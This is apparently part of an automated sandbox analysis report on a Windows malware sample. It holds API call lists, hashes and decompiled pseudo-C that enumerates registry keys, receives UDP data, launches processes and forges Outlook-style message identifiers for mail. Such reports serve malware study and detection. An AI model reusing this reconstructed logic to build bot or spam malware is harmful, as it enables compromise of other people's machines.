                                                                                0x00402c4b
                                                                                0x00402c5f
                                                                                0x00402c63
                                                                                0x00402c69
                                                                                0x00402c71
                                                                                0x00402c6b
                                                                                0x00402c6b
                                                                                0x00402c6b
                                                                                0x00402c4d
                                                                                0x00402c57
                                                                                0x00402c57
                                                                                0x00402c73
                                                                                0x00000000
                                                                                0x00402c73
                                                                                0x00402bd1
                                                                                0x00402bc9
                                                                                0x00402b8b
                                                                                0x00402b90
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402b90
                                                                                0x00402c95
                                                                                0x00402c95
                                                                                0x00402c9e
                                                                                0x00402ac3
                                                                                0x00402ac7
                                                                                0x00000000
                                                                                0x00402ac7
                                                                                0x00000000
                                                                                0x00402ca4
                                                                                0x00402ac9
                                                                                0x00402aae
                                                                                0x00000000

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,74CB4F20), ref: 00402A83
                                                                                • HeapAlloc.KERNEL32(00000000,?,74CB4F20), ref: 00402A86
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
                                                                                • htons.WS2_32(00000000), ref: 00402ADB
                                                                                • select.WS2_32 ref: 00402B28
                                                                                • recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
                                                                                • htons.WS2_32(?), ref: 00402B71
                                                                                • htons.WS2_32(?), ref: 00402B8C
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00402BFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heaphtons$Process$Allocrecvselectsocket
                                                                                • String ID:
                                                                                • API String ID: 1639031587-0
                                                                                • Opcode ID: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
                                                                                • Instruction ID: 51c4a8f8372388146ce05ee3fd67d3b8acfed2692fca977a8adbfce498b2b585
                                                                                • Opcode Fuzzy Hash: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
                                                                                • Instruction Fuzzy Hash: FB61D271508305ABD7209F51DE0CB6FBBE8FB48345F14482AF945A72D1D7F8D8808BAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ShellExecuteExW.SHELL32(?), ref: 00E31601
                                                                                • lstrlenW.KERNEL32(-00000003), ref: 00E317D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShelllstrlen
                                                                                • String ID: $<$@$D
                                                                                • API String ID: 1628651668-1974347203
                                                                                • Opcode ID: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                • Instruction ID: eb7b11ed4c53c948c266725589cd2bd5011abf538380d47c3ee2616faaf710b6
                                                                                • Opcode Fuzzy Hash: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                • Instruction Fuzzy Hash: 2EF17CB15083419FD720CF64C888BABBBE4FBC9305F10896DF596A7290D7B4D944CB66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 00E376D9
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000101,?), ref: 00E37757
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104), ref: 00E3778F
                                                                                • ___ascii_stricmp.LIBCMT ref: 00E378B4
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00E3794E
                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00E3796D
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00E3797E
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00E379AC
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00E37A56
                                                                                  • Part of subcall function 00E3F40C: lstrlen.KERNEL32(000000E4,00000000,004122F8,000000E4,00E3772A,?), ref: 00E3F414
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00E379F6
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00E37A4D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                • String ID: "
                                                                                • API String ID: 3433985886-123907689
                                                                                • Opcode ID: 1023eff4b56b9a7853b73631c2f3480fec1a45e58b56effd08988566cadd104d
                                                                                • Instruction ID: 598543b073969cb89e6693c132daf4115355dedefa96f9f9e6bc49f3fd328f43
                                                                                • Opcode Fuzzy Hash: 1023eff4b56b9a7853b73631c2f3480fec1a45e58b56effd08988566cadd104d
                                                                                • Instruction Fuzzy Hash: 77C1C1B2904209AFEB219BA4DC4DFEEBFB9AF44310F1051A5F544F6191EB708E80CB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E0040704C(intOrPtr _a4, int _a8, int _a12, int _a16, int* _a20) {
                                                                                				CHAR* _v8;
                                                                                				void* _v12;
                                                                                				char _v16;
                                                                                				int _v20;
                                                                                				char _v24;
                                                                                				char _v28;
                                                                                				signed int _v32;
                                                                                				char _v64;
                                                                                				char _v363;
                                                                                				char _v364;
                                                                                				void _v400;
                                                                                				intOrPtr* _t88;
                                                                                				int* _t89;
                                                                                				int* _t90;
                                                                                				int* _t91;
                                                                                				char* _t93;
                                                                                				signed int _t96;
                                                                                				signed int _t97;
                                                                                				long _t99;
                                                                                				signed int _t107;
                                                                                				int _t109;
                                                                                				int _t119;
                                                                                				int _t121;
                                                                                				int _t122;
                                                                                				int _t123;
                                                                                				signed int _t125;
                                                                                				int _t130;
                                                                                				int _t136;
                                                                                				int _t149;
                                                                                				int _t155;
                                                                                				void* _t158;
                                                                                				void* _t166;
                                                                                				int _t196;
                                                                                				int _t202;
                                                                                				void* _t203;
                                                                                				void* _t204;
                                                                                				void* _t206;
                                                                                				void* _t207;
                                                                                
                                                                                				_t88 = _a8;
                                                                                				_t167 = 0;
                                                                                				_v16 = 0x12c;
                                                                                				_v24 = 0x20;
                                                                                				_v364 = 0;
                                                                                				if(_t88 != 0) {
                                                                                					 *_t88 = 0;
                                                                                				}
                                                                                				_t89 = _a12;
                                                                                				if(_t89 != _t167) {
                                                                                					 *_t89 = _t167;
                                                                                				}
                                                                                				_t90 = _a16;
                                                                                				if(_t90 != _t167) {
                                                                                					 *_t90 = _t167;
                                                                                				}
                                                                                				_t91 = _a20;
                                                                                				if(_t91 != _t167) {
                                                                                					 *_t91 = _t167;
                                                                                				}
                                                                                				_t93 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
                                                                                				_t204 = _t203 + 0x14;
                                                                                				if(RegOpenKeyExA(0x80000001, _t93, _t167, 0x101,  &_v12) != 0) {
                                                                                					L21:
                                                                                					_t96 = E0040EE2A(_t167, 0x4122f8, 0, 0x100) | 0xffffffff;
                                                                                					goto L22;
                                                                                				} else {
                                                                                					_t97 = E00406DC2(_t167);
                                                                                					_push( &_v16);
                                                                                					_push( &_v364);
                                                                                					_push( &_v28);
                                                                                					_v32 = _t97;
                                                                                					_push(0);
                                                                                					_push( &_v24);
                                                                                					_t167 =  &_v64;
                                                                                					_push( &_v64);
                                                                                					_v8 = 0;
                                                                                					_push(0);
                                                                                					while(1) {
                                                                                						_t99 = RegEnumValueA(_v12, ??, ??, ??, ??, ??, ??, ??);
                                                                                						if(_t99 == 0x103) {
                                                                                							break;
                                                                                						}
                                                                                						__eflags = _t99;
                                                                                						if(_t99 != 0) {
                                                                                							L18:
                                                                                							_t25 =  &_v8;
                                                                                							 *_t25 =  &(_v8[1]);
                                                                                							__eflags =  *_t25;
                                                                                							_push( &_v16);
                                                                                							_push( &_v364);
                                                                                							_push( &_v28);
                                                                                							_push(0);
                                                                                							_push( &_v24);
                                                                                							_push( &_v64);
                                                                                							_push(_v8);
                                                                                							_v16 = 0x12c;
                                                                                							_v24 = 0x20;
                                                                                							continue;
                                                                                						}
                                                                                						__eflags = _v24 - _t99;
                                                                                						if(_v24 <= _t99) {
                                                                                							goto L18;
                                                                                						}
                                                                                						__eflags = _v16 - _t99;
                                                                                						if(_v16 <= _t99) {
                                                                                							goto L18;
                                                                                						}
                                                                                						__eflags = _v28 - 1;
                                                                                						if(_v28 != 1) {
                                                                                							goto L18;
                                                                                						}
                                                                                						_t107 = E0040EED1( &_v64, E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8));
                                                                                						_t206 = _t204 + 0x1c;
                                                                                						asm("sbb eax, eax");
                                                                                						_t109 =  ~_t107 + 1;
                                                                                						__eflags = _t109;
                                                                                						_v20 = _t109;
                                                                                						if(_t109 != 0) {
                                                                                							L23:
                                                                                							_v8 = E0040EE95( &_v364, E00402544(0x4122f8,  &E0041069C, 4, 0xe4, 0xc8));
                                                                                							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
                                                                                							_t207 = _t206 + 0x28;
                                                                                							__eflags = _v8;
                                                                                							if(_v8 == 0) {
                                                                                								__eflags = _v364 - 0x22;
                                                                                								if(_v364 == 0x22) {
                                                                                									E0040EF00( &_v364,  &_v363);
                                                                                									_t149 = E0040ED23( &_v364, 0x22);
                                                                                									_t207 = _t207 + 0x10;
                                                                                									__eflags = _t149;
                                                                                									if(_t149 != 0) {
                                                                                										 *_t149 = 0;
                                                                                									}
                                                                                								}
                                                                                								_t196 = E0040EE95( &_v364, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
                                                                                								E0040EE2A(_t167, 0x4122f8, 0, 0x100);
                                                                                								__eflags = _t196;
                                                                                								if(_t196 != 0) {
                                                                                									_t119 = E0040ED77( &_v364, _a4);
                                                                                									__eflags = _t119;
                                                                                									if(_t119 != 0) {
                                                                                										 *_t196 = 0;
                                                                                										_t121 = E0040ED23( &_v364, 0x5c);
                                                                                										_v8 = _t121;
                                                                                										__eflags = _t121;
                                                                                										if(_t121 != 0) {
                                                                                											_t63 =  &_v8;
                                                                                											 *_t63 =  &(_v8[1]);
                                                                                											__eflags =  *_t63;
                                                                                										} else {
                                                                                											_v8 =  &_v364;
                                                                                										}
                                                                                										_t122 = E00406CAD(_v8);
                                                                                										__eflags = _t122;
                                                                                										if(_t122 != 0) {
                                                                                											asm("popad");
                                                                                											asm("popad");
                                                                                											asm("popad");
                                                                                											asm("popad");
                                                                                											_push(0x8b00007e);
                                                                                											asm("lock xor esi, 0x55555555");
                                                                                											_v16 = 0x4122f8;
                                                                                											_t166 = 0xad;
                                                                                											_t123 = E00406C96(0x4122f8);
                                                                                											__eflags = _t123;
                                                                                											if(_t123 != 0) {
                                                                                												L57:
                                                                                												RegCloseKey(_v12);
                                                                                												__eflags = _a16;
                                                                                												if(_a16 != 0) {
                                                                                													E0040EF00(_a16,  &_v64);
                                                                                												}
                                                                                												_t125 = 0;
                                                                                												__eflags = _v20;
                                                                                												 *_t196 = 0x2e;
                                                                                												goto L34;
                                                                                											}
                                                                                											_t71 = _t166 - 0x40; // 0x4122b8
                                                                                											__eflags = _t71 - 0x3f;
                                                                                											if(_t71 > 0x3f) {
                                                                                												goto L57;
                                                                                											}
                                                                                											__eflags = 0xf8 - 0x10;
                                                                                											if(0xf8 >= 0x10) {
                                                                                												goto L57;
                                                                                											}
                                                                                											_t202 = _a12;
                                                                                											 *_t196 = 0x2e;
                                                                                											__eflags = _t202;
                                                                                											if(_t202 != 0) {
                                                                                												_t136 = GetFileAttributesExA( &_v364, 0,  &_v400);
                                                                                												__eflags = _t136;
                                                                                												if(_t136 != 0) {
                                                                                													 *_t202 = 1;
                                                                                												}
                                                                                											}
                                                                                											_t130 = _a8;
                                                                                											__eflags = _t130;
                                                                                											if(_t130 != 0) {
                                                                                												 *_t130 = _t166;
                                                                                											}
                                                                                											__eflags = _a16;
                                                                                											if(_a16 != 0) {
                                                                                												E0040EF00(_a16,  &_v64);
                                                                                											}
                                                                                											__eflags = _a20;
                                                                                											if(_a20 != 0) {
                                                                                												E0040EF00(_a20, _v8);
                                                                                											}
                                                                                											_t125 = 0;
                                                                                											__eflags = _v20;
                                                                                											goto L34;
                                                                                										} else {
                                                                                											RegCloseKey(_v12);
                                                                                											__eflags = _a16;
                                                                                											if(_a16 != 0) {
                                                                                												E0040EF00(_a16,  &_v64);
                                                                                											}
                                                                                											 *_t196 = 0x2e;
                                                                                											goto L33;
                                                                                										}
                                                                                									}
                                                                                									RegCloseKey(_v12);
                                                                                									_t96 = 0;
                                                                                									goto L22;
                                                                                								} else {
                                                                                									RegCloseKey(_v12);
                                                                                									__eflags = _a16;
                                                                                									if(_a16 != 0) {
                                                                                										E0040EF00(_a16,  &_v64);
                                                                                									}
                                                                                									L33:
                                                                                									_t125 = 0;
                                                                                									__eflags = _v20;
                                                                                									L34:
                                                                                									_t96 = (_t125 & 0xffffff00 | __eflags == 0x00000000) + 1;
                                                                                									L22:
                                                                                									return _t96;
                                                                                								}
                                                                                							}
                                                                                							RegCloseKey(_v12);
                                                                                							__eflags = _a16;
                                                                                							if(_a16 != 0) {
                                                                                								E0040EF00(_a16,  &_v64);
                                                                                							}
                                                                                							_t96 = 1;
                                                                                							goto L22;
                                                                                						}
                                                                                						_t155 = E00406CAD( &_v64);
                                                                                						_pop(_t167);
                                                                                						__eflags = _t155;
                                                                                						if(_t155 == 0) {
                                                                                							L17:
                                                                                							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
                                                                                							_t204 = _t206 + 0xc;
                                                                                							goto L18;
                                                                                						}
                                                                                						_t158 = E0040F1A5( &_v64);
                                                                                						_t167 = _v32 ^ 0x61616161;
                                                                                						__eflags = _t158 - (_v32 ^ 0x61616161);
                                                                                						if(_t158 == (_v32 ^ 0x61616161)) {
                                                                                							goto L23;
                                                                                						}
                                                                                						goto L17;
                                                                                					}
                                                                                					RegCloseKey(_v12);
                                                                                					goto L21;
                                                                                				}
                                                                                			}

                                                                                0x00407055
                                                                                0x00407058
                                                                                0x0040705a
                                                                                0x00407061
                                                                                0x00407068
                                                                                0x00407071
                                                                                0x00407073
                                                                                0x00407073
                                                                                0x00407075
                                                                                0x0040707a
                                                                                0x0040707c
                                                                                0x0040707c
                                                                                0x0040707e
                                                                                0x00407083
                                                                                0x00407085
                                                                                0x00407085
                                                                                0x00407087
                                                                                0x0040708c
                                                                                0x0040708e
                                                                                0x0040708e
                                                                                0x004070b4
                                                                                0x004070b9
                                                                                0x004070ca
                                                                                0x004071b8
                                                                                0x004071c8
                                                                                0x00000000
                                                                                0x004070d0
                                                                                0x004070d0
                                                                                0x004070d8
                                                                                0x004070df
                                                                                0x004070e3
                                                                                0x004070e4
                                                                                0x004070e9
                                                                                0x004070ed
                                                                                0x004070ee
                                                                                0x004070f1
                                                                                0x004070f2
                                                                                0x004070f5
                                                                                0x0040719b
                                                                                0x0040719e
                                                                                0x004071a9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004070fb
                                                                                0x004070fd
                                                                                0x0040716e
                                                                                0x0040716e
                                                                                0x0040716e
                                                                                0x0040716e
                                                                                0x00407174
                                                                                0x0040717b
                                                                                0x0040717f
                                                                                0x00407180
                                                                                0x00407185
                                                                                0x00407189
                                                                                0x0040718a
                                                                                0x0040718d
                                                                                0x00407194
                                                                                0x00000000
                                                                                0x00407194
                                                                                0x004070ff
                                                                                0x00407102
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407104
                                                                                0x00407107
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407109
                                                                                0x0040710d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407123
                                                                                0x00407128
                                                                                0x0040712d
                                                                                0x0040712f
                                                                                0x0040712f
                                                                                0x00407130
                                                                                0x00407133
                                                                                0x004071d0
                                                                                0x004071f4
                                                                                0x004071f7
                                                                                0x004071fc
                                                                                0x004071ff
                                                                                0x00407203
                                                                                0x00407227
                                                                                0x0040722e
                                                                                0x0040723e
                                                                                0x0040724c
                                                                                0x00407251
                                                                                0x00407254
                                                                                0x00407256
                                                                                0x00407258
                                                                                0x00407258
                                                                                0x00407256
                                                                                0x00407280
                                                                                0x00407282
                                                                                0x0040728a
                                                                                0x0040728c
                                                                                0x004072c2
                                                                                0x004072c9
                                                                                0x004072cb
                                                                                0x004072e6
                                                                                0x004072e8
                                                                                0x004072ef
                                                                                0x004072f2
                                                                                0x004072f4
                                                                                0x00407301
                                                                                0x00407301
                                                                                0x00407301
                                                                                0x004072f6
                                                                                0x004072fc
                                                                                0x004072fc
                                                                                0x00407307
                                                                                0x0040730d
                                                                                0x0040730f
                                                                                0x00407335
                                                                                0x00407336
                                                                                0x00407337
                                                                                0x00407338
                                                                                0x00407339
                                                                                0x0040733e
                                                                                0x0040734b
                                                                                0x0040734e
                                                                                0x00407354
                                                                                0x0040735b
                                                                                0x0040735d
                                                                                0x004073d5
                                                                                0x004073d8
                                                                                0x004073de
                                                                                0x004073e2
                                                                                0x004073eb
                                                                                0x004073f1
                                                                                0x004073f2
                                                                                0x004073f4
                                                                                0x004073f7
                                                                                0x00000000
                                                                                0x004073f7
                                                                                0x0040735f
                                                                                0x00407362
                                                                                0x00407365
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040736d
                                                                                0x00407370
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407372
                                                                                0x00407375
                                                                                0x0040737a
                                                                                0x0040737c
                                                                                0x0040738d
                                                                                0x00407393
                                                                                0x00407395
                                                                                0x00407397
                                                                                0x00407397
                                                                                0x00407395
                                                                                0x0040739d
                                                                                0x004073a0
                                                                                0x004073a2
                                                                                0x004073a4
                                                                                0x004073a4
                                                                                0x004073a6
                                                                                0x004073a9
                                                                                0x004073b2
                                                                                0x004073b8
                                                                                0x004073b9
                                                                                0x004073bc
                                                                                0x004073c4
                                                                                0x004073ca
                                                                                0x004073cb
                                                                                0x004073cd
                                                                                0x00000000
                                                                                0x00407311
                                                                                0x00407314
                                                                                0x0040731a
                                                                                0x0040731d
                                                                                0x00407326
                                                                                0x0040732c
                                                                                0x0040732d
                                                                                0x00000000
                                                                                0x0040732d
                                                                                0x0040730f
                                                                                0x004072d0
                                                                                0x004072d6
                                                                                0x00000000
                                                                                0x0040728e
                                                                                0x00407291
                                                                                0x00407297
                                                                                0x0040729a
                                                                                0x004072a3

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000101,74CB43E0,?,74CB43E0,00000000), ref: 004070C2
                                                                                • RegEnumValueA.ADVAPI32(74CB43E0,00000000,?,00000020,00000000,00000000,00000000,0000012C,?,74CB43E0,00000000), ref: 0040719E
                                                                                • RegCloseKey.ADVAPI32(74CB43E0,?,74CB43E0,00000000), ref: 004071B2
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00407208
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00407291
                                                                                • ___ascii_stricmp.LIBCMT ref: 004072C2
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 004072D0
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00407314
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040738D
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 004073D8
                                                                                  • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,004122F8,000000C8,00407150,?), ref: 0040F1AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
                                                                                • String ID: $"
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E32CED
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 00E32D07
                                                                                • htons.WS2_32(00000000), ref: 00E32D42
                                                                                • select.WS2_32 ref: 00E32D8F
                                                                                • recv.WS2_32(?,00000000,00001000,00000000), ref: 00E32DB1
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00E32E62
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocateProcesshtonsrecvselectsocket
                                                                                • String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E0040AD89(void* __ecx, void* __eflags) {
                                                                                				signed int _t48;
                                                                                				signed int _t50;
                                                                                				void* _t53;
                                                                                				intOrPtr _t55;
                                                                                				void* _t76;
                                                                                				signed int _t77;
                                                                                				void* _t81;
                                                                                				CHAR* _t92;
                                                                                				void* _t94;
                                                                                				void* _t96;
                                                                                				void* _t98;
                                                                                
                                                                                				_t76 = __ecx;
                                                                                				_t94 = _t96 - 0x74;
                                                                                				GetLocalTime(_t94 + 0x50);
                                                                                				SystemTimeToFileTime(_t94 + 0x50, _t94 + 0x64);
                                                                                				E0040EE2A(_t76, _t94 - 0x110, 0, 0x80);
                                                                                				E0040AD08(_t94 - 0x110);
                                                                                				_t98 = _t96 - 0x184 + 0x10;
                                                                                				if(E004030B5() == 0) {
                                                                                					 *((intOrPtr*)(_t94 + 0x6c)) = "127.0.0.1";
                                                                                				} else {
                                                                                					_push(_t94 - 0x90);
                                                                                					 *((intOrPtr*)(_t94 + 0x6c)) = E0040A7A3(_t47, _t47);
                                                                                				}
                                                                                				_t48 = E0040ECA5();
                                                                                				_t77 = 0xe;
                                                                                				_t50 = E0040ECA5();
                                                                                				_t92 = "%OUTLOOK_BND_";
                                                                                				 *((intOrPtr*)(_t94 + 0x70)) = (_t50 & 0x00000001) + _t48 % _t77 + 0xb;
                                                                                				_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
                                                                                				while(1) {
                                                                                					_t103 = _t53;
                                                                                					if(_t53 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_t55 = E0040EDAC(_t53 + 0xd);
                                                                                					_t81 =  *((intOrPtr*)(_t94 + 0x70)) + _t55;
                                                                                					__eflags = _t81;
                                                                                					 *((intOrPtr*)(_t94 + 0x60)) = _t55;
                                                                                					wsprintfA(_t94 - 0x70, "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX", _t55, _t81,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64));
                                                                                					wsprintfA(_t94 + 0x10, "%s%d", _t92,  *((intOrPtr*)(_t94 + 0x60)));
                                                                                					E0040EF7C(__eflags,  *((intOrPtr*)(_t94 + 0x7c)), _t94 + 0x10, _t94 - 0x70, 0x3e800, 0);
                                                                                					_t98 = _t98 + 0x40;
                                                                                					_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
                                                                                				}
                                                                                				wsprintfA(_t94 - 0x70, "%04x%08.8lx$%08.8lx$%08x@%s",  *((intOrPtr*)(_t94 + 0x70)) + 3,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64),  *((intOrPtr*)(_t94 + 0x6c)), _t94 - 0x110);
                                                                                				E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_MID", _t94 - 0x70, 0x3e800, 0);
                                                                                				return E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_HST", _t94 - 0x110, 0x3e800, 0);
                                                                                			}

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 0040AD98
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040ADA6
                                                                                  • Part of subcall function 0040AD08: gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                  • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                  • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                  • Part of subcall function 0040AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                  • Part of subcall function 004030B5: gethostname.WS2_32(?,00000080), ref: 004030D8
                                                                                  • Part of subcall function 004030B5: gethostbyname.WS2_32(?), ref: 004030E2
                                                                                • wsprintfA.USER32 ref: 0040AEA5
                                                                                  • Part of subcall function 0040A7A3: inet_ntoa.WS2_32(?), ref: 0040A7A9
                                                                                • wsprintfA.USER32 ref: 0040AE4F
                                                                                • wsprintfA.USER32 ref: 0040AE5E
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                • String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 55%
                                                                                			E00402DF2(intOrPtr _a4) {
                                                                                				void* _v8;
                                                                                				signed int _v12;
                                                                                				long _v16;
                                                                                				intOrPtr _v28;
                                                                                				short _v30;
                                                                                				char _v32;
                                                                                				struct HINSTANCE__* _t18;
                                                                                				void* _t22;
                                                                                				signed int _t23;
                                                                                				short _t27;
                                                                                				signed int _t31;
                                                                                				intOrPtr* _t35;
                                                                                				intOrPtr* _t37;
                                                                                				CHAR* _t38;
                                                                                				void* _t40;
                                                                                
                                                                                				_t38 = "iphlpapi.dll";
                                                                                				_t18 = GetModuleHandleA(_t38);
                                                                                				if(_t18 == 0 || _t18 == 0xffffffff) {
                                                                                					_t18 = LoadLibraryA(_t38);
                                                                                				}
                                                                                				if(_t18 == 0 || _t18 == 0xffffffff) {
                                                                                					L18:
                                                                                					return 0;
                                                                                				} else {
                                                                                					_t35 = GetProcAddress(_t18, "GetNetworkParams");
                                                                                					if(_t35 == 0) {
                                                                                						goto L18;
                                                                                					}
                                                                                					_t22 = HeapAlloc(GetProcessHeap(), 0, 0x4000);
                                                                                					_t33 =  &_v16;
                                                                                					_v8 = _t22;
                                                                                					_v16 = 0x4000;
                                                                                					_t23 =  *_t35(_t22,  &_v16);
                                                                                					if(_t23 != 0) {
                                                                                						goto L18;
                                                                                					}
                                                                                					_v12 = _v12 & _t23;
                                                                                					_t37 = _v8 + 0x10c;
                                                                                					if(_t37 == 0) {
                                                                                						L17:
                                                                                						HeapFree(GetProcessHeap(), 0, _v8);
                                                                                						return _v12;
                                                                                					} else {
                                                                                						goto L8;
                                                                                					}
                                                                                					do {
                                                                                						L8:
                                                                                						_t40 = _t37 + 4;
                                                                                						if(_t40 == 0) {
                                                                                							goto L16;
                                                                                						}
                                                                                						_t27 = 2;
                                                                                						_v32 = _t27;
                                                                                						__imp__#9(0x35);
                                                                                						_v30 = _t27;
                                                                                						__imp__#11(_t40);
                                                                                						_v28 = _t27;
                                                                                						if(_t27 == 0 || _t27 == 0xffffffff) {
                                                                                							__imp__#52(_t40);
                                                                                							if(_t27 == 0) {
                                                                                								goto L16;
                                                                                							}
                                                                                							_t27 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc))))));
                                                                                							_v28 = _t27;
                                                                                							goto L13;
                                                                                						} else {
                                                                                							L13:
                                                                                							if(_t27 != 0 && _t27 != 0xffffffff) {
                                                                                								_t31 = E00402CEB(_t33,  &_v32, _a4);
                                                                                								_pop(_t33);
                                                                                								_v12 = _t31;
                                                                                								if(_t31 != 0) {
                                                                                									goto L17;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						L16:
                                                                                						_t37 =  *_t37;
                                                                                					} while (_t37 != 0);
                                                                                					goto L17;
                                                                                				}
                                                                                			}
                                                                                0x00402e88
                                                                                0x00402e8f
                                                                                0x00402e93
                                                                                0x00402e99
                                                                                0x00402e9e
                                                                                0x00402ea6
